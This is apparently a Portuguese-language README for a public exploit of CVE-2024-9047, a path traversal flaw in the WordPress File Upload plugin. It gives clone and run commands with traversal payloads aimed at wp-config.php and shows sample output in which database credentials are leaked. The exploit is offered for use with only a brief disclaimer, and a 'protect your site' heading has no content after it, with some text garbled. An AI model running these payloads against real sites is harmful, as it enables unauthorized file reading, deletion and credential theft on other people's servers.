
Exploit para o Plugin de Upload de Arquivos do WordPress - Todas as versões até 4.24.11 são vulneráveis.
O plugin WordPress File Upload para WordPress é vulnerável a uma vulnerabilidade de Path Traversal em todas as versões até, e incluindo, 4.24.11 através do arquivo wfu_file_downloader.php. Essa vulnerabilidade permite que atacantes não autenticados leiam ou excluam arquivos fora do diretório pretendido. A exploração bem-sucedida requer que a instalação do WordPress alvo esteja rodando PHP 7.4 ou anterior.
Um atacante pode explorar essa vulnerabilidade criando uma requisição específica para o endpoint vulnerável, wfu_file_downloader.php, e manipulando o parâmetro de caminho do arquivo para obter acesso não autorizado a arquivos sensíveis no servidor.
4.24.11 ou anterior).7.4 ou anterior.Clone este repositório:
git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
cd CVE-2024-9047-Exploit
Instale as dependências Python (se necessário):
pip install requests
Execute o script para verificar a versão do plugin e explorar a vulnerabilidade:
python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
Para explorar a configuração vulnerável padrão e ler o arquivo de configuração do WordPress:
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );
/** Database username */
define( 'DB_USER', 'root' );
/** Database password */
define( 'DB_PASSWORD', '' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
Para proteger seu site WordPress:
Este código é destinado apenas para fins educacionais e de pesquisa. O uso não autorizado deste script em sistemas que você não possui ou sem permissão explícita para testar é ilegal e antiético. Os autores não assumem responsabilidade por qualquer uso indevido deste código.